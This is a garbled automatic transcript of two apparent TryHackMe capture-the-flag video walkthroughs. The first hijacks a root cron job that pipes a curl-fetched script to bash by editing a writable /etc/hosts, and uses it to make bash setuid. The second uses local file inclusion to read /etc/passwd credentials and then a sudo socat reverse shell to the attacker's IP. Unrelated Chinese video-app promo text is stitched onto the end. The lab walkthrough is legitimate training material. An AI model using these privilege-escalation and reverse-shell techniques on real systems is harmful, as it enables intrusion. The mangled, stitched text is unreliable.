tri hack me is a lot of privileges he's in pseudo blah blah blah blah blah our sink stuff possible private keys yep we found those we have those cloud on it files sew it files and nothing stands out to me capabilities weird to see a cd rom file okay modify interesting oh gpg stuff let's peculiar find a blog files backup files all hidden files there's a lot in here whoa okay i don't need to see all that interesting right of interesting writable files owned by me irritable by everyone that are not in my home directory it set rah hosts is in the list okay okay cool so if we can modify it several hosts and what we could do is we could act as that curl command right that was in oh boy i gotta find it again now it was the curling overpass thm slash downloads source built script that i say h pipe to bash and that would run like every minute right so if i were trying do that now looks like it's getting okay the one off of this website， but let's modify that so right now let me change this profile this will be the victim that we're in and this will be my server my machine because i want to know my ip address if i can type turn zero ip address address show my ip address there and let's modify that it's at rehost file because we do have right access in there supposedly and let's change the overpass thm location and make it my address yeah so that way if i were to paying overpass thm， you can see now i'm actually reaching my attacker machine great so let's make a little directory for ourselves and we'll like fake and simulate like pseudo create the same file structure as what that command is expecting in crawn as it's running every minute so let me make let's see it's a downloads source and then we have the script itself so let's make attack p to make all of those directories we'll top in there and let's create a simple bash script build script dot s h that will been bash there we go and we can have this do literally whatever we want because that will be executed through bash i think the easiest way to give us accessible root privileges is make the bash binary set uid so that way we'll be able to like i don't know invoke it and keep our root privileges so right now if you check out the permissions on bin bash sure it isn't owned by root executable but it doesn't have a sticky bit set or it's not set uid using that we could just invoke it with tacp and that way we could maintain root readily needs you could do other things like callback， reverse shell or whatever you want but i want to kind of keep me in this for simplicity's sake all right let's hurry it up because we're getting to a really long video and just really doesn't need to be so let's get back to the root of this directory right， let's actually watch this ls tack la and see when it's gonna hit looks like i still have like half a minute to go and this will we know from the crown up but this will happen on the clock every minute on the minute so let's fire up my http server and that's going to listen on port 8000 by default so if i want to specify port 80 i could specify that as a last argument but we need rupert religious to do that on mario bunto system so let me pseudo python tech in that type in my password as fast as i can great now we are very very close to the end of the minute so we should see a get request come through on our attacker machine done and we should see this switch to an s or a sticky bit set you id all right so let's stop watching that and let's ben bash tagp and now we're root very very cool we were just abusing that little curl command that's in krawan that is a running commands as root and it's pulled from external resource or at least we can control where that resource is because it's in etc rehose file that we have right access to so we could hop on over to root and we could simply cat out that root dot text and be done with it nice nice nice the easter egg if you wanted to you could go find that well careful there john if you wanted to you could go check out try hack me that a user account that we saw he does have an overpass account so we could cat out that file and see what other information information that might have as usual it's just rob 47 so we could go hop over to this little decoder decrypt that and kind of easy there's a little triadmi subscription code， but someone has already found that right no sense trying to submit it but very very neat， very very cool， very very fun i really liked the idea of this box and that was kind of fun and it was cool to kind of work through some of those and i like that simple it's at raho's trick so i hope you guys thought that was also very neat， very enjoyable take good notes if that's something that you want to do as usual i started to read me file and then did nothing with it but so ever but hey， thank you guys so much for watching i really hope you enjoyed this video if you did， please do press that like button do the youtube algorithm things leave me a comment hopefully subscribe thank you you guys are the best thanks so much for watching i'll see you in the next video take care。

what's going on everybody my name is john hammond this is another tri hackney video and i want to be showcasing the inclusion room which is just a beginner local file inclusion challenge that we can go check out it is free you don't have to be subscribed accessor's room so we'll go ahead and join it and deploy our machine so i will go ahead and set up some rooms here for this i'll go ahead and say inclusion will have its own directory i'll make a simple n map directory and kind of get started with an n map skin while this guy is running so i will n map c s v n n map initial and i'll paste in the ip address there i'll also go ahead and export that ip address there and it probably still taking its time to spin up so let me actually verify that i can ping him give him a little bit of time whatever， let's go ahead and sort of read me file if he's still taking his time to cook， we'll call that inclusion just for our notes and i'll go ahead and export that ip address to that they already have that yeah i did have that copy pasted in my clipboard there so let's create some skeleton stuff for our own documentation and our own notes so we can work with this look like he's up okay， so now let's go ahead and start the n map script again it says deploy the machine and start numerating roger that no answer needed for that task one seemingly let's go check out what task two has us do user flag and root flag so simple stuff looks like no guidance just jump in and beat the machine up so root flag let's get a section for n map scan let's take a look at what we have here once that loads considering this are talking about local file inclusion i'm gonna assume it's going to be asking us to work on a web page so let me fire that up another tab here that will not connect maybe it's not on port 80 old hosts your thing is down everything is down everything is closed that machine is up do i have multiple instances of openvpn running just one let's make sure tagpn is getting the way but pain works so that's not that's clearly not it so make it aggressive let's see what we got now it loads okay what whatever hello world woke in my blog it's currently very really stage you can find some of the articles that i wrote you can view the details valifi attack or rfi attack most common file units that we can check is etcetera password huh all right so if i make our url visible let's go check out some of those articles yeah article name equals lfi attack so the name here looks to be the argument or the variable that's kind of being passed with http and a simple http get variable that is allowing us to select other files that are included in here and that looks like they describe it here in this page if you view the source it looks a little bit better because looking at it in this code and really kind of ruins everything the new lines are gone so file equals the get variable used through php and it will unsafely include the file like including directory into file that's how the syntax looks in php and we've seen that probably a lot of other videos and we've seen that before so we can very very much kind of climb the directory tree using the period period or the dot dot to move up parent directory， parent director， parent directory， etc etc so this is super simple kind of pretty easy looks like they offer another resource that's doing this as well or explaining what this really is okay there we go and that gives us some code blocks to kind of read the php a little bit more so let's just jump in and go ahead and view the soros on any cage that we might want to read so we need to supply a value for that name and let's climb the directory tree with dot slash， dot dot slash， dot slash and we'll check out it's every password so there's some stuff in here again we're gonna need to view the source because we have these users displayed huh at the bottom we see this one kind of comments it out falcon feast with root password that's pretty cheesy maybe that is an account we could use to log in and ssh is open now that our end maps can finally came back so let's include this in our notes paste that guy in here and let's perform lfi attack good my face is not in the way just yet let's go ahead and grab this so if we were running from our terminal we could just simply curl bat and that will return the credentials that we just potentially found and now let's ssh to that ip address with falcon feast as our username and we know that the password should be root password which is peculiar that did not work why did that not work falcon feast at ip address？ what what what falcon feast falcon feast root password does a root have a password nothing except what is that supposed to be is that the right ip address am i connecting to something that i had in a previous video falcon feast ip okay i was clearly using the wrong ip address as my environment variable this is the problem of doing videos back to back just trying to turn stuff out for you guys trying to make you some good stuff hopefully， i feel like i also lose a certain amount of quality when i'm trying to do a lot of these it's like quantity versus quality thing did i just say the same word twice， i feel like i did quality versus quantity all right so now we are ssh into that machine um looks like we have our user flag here， so we can go ahead and cat that out i'll spit that into our try hack me submission good good good also take note of that in our notes there and now we also want to probably escalate our privileges to be root we could run limpies， but let's just verify are there anything we can run with pseudo looks like we can we can run user bin no， so cat without a password so let's check gtf opens fantastic resource for doing malicious things potentially malicious things with kind of built in binaries that we might see on a system so cat can get a reverse shell a bind shell also pseudo access okay it has to have a connection back we can just break it out so let's fire up our own terminal let's see what our ip address is i'm still 1089， 112 and let's get a port going so netcat lmbp quad 9 and let's try to pseudo user bin socat， so user bin and then my forward slash to type in socat and oh wait a second it's listening i'm confused with this is doing it runs in privilege contact and we will access the file system escalator maintain access run file tty raw oh so it just like reads in standard input is that what that does nine， nine， nine and then i need to supply this oh oh maybe that syntax is what i should be supplying not that that kind of looks like it's just like listening can i do that can i netcat to the machine ip is it binding ten ten one fifty seven two forty five quad 9 id okay he's just being a socket that's not helpful for me let's spin our shell back up and let's modify that command that gtf opens gave us so we know to connect to 10 dot 8 dot nine dot 1112 and our hour port that we are listening on on our attacking machine is quad 9 so we now i am not allowed to preserve the environment what does that mean taki there we go now have a root shell now i am root we you try and stabilize the shell at some foreman's pentest stuff do i have python print hello， you know what print please subscribe use a little shameless plug there python we do not have how about python three taxi prints please up this is completely useless because we have room we don't need to do that but whatever let's stabilize that shell we literally just need to go get the root flag whatever， we have a scene shell and we can use our auto complete and left and right and arrow keys so hey it makes me happy i hope it makes you happy to there is our root flag let's go ahead and submit that bad boy and call this machine done so super simple technique right just local file inclusion for some reason an inside of et cetera password there was a comment with some user credentials and that had count had some privilegisculation route and attack vector to become root so completely on that machine that simple case of local file inclusion you've seen it before i'm sure in tons of other videos but this room just emphasizes it showcases it and highlights it so hope you guys enjoyed watching if you did please press that like button and comment button subscribe button the bell button， the probably other buttons you can click too in my face like the little icon thanks for watching everybody i hate you and after us i'm just gonna leave i'm just gonna go， thanks， thanks for watching。

啊项链拽一下换装这么多赞 try me 快找个项链快点给我火。哎头发剪丑了。 首先拍摄两段视频，然后点击本视频左下角链接，点击一键开始创作，然后就会自动跳转到小风同款模板，点击键同款添加刚刚拍摄的两段视频，点击视频裁剪调整视频位置，然后点击导出一键分享到抖音，这样不会被限流。好啦看成品 try me。

direct with dj skin look。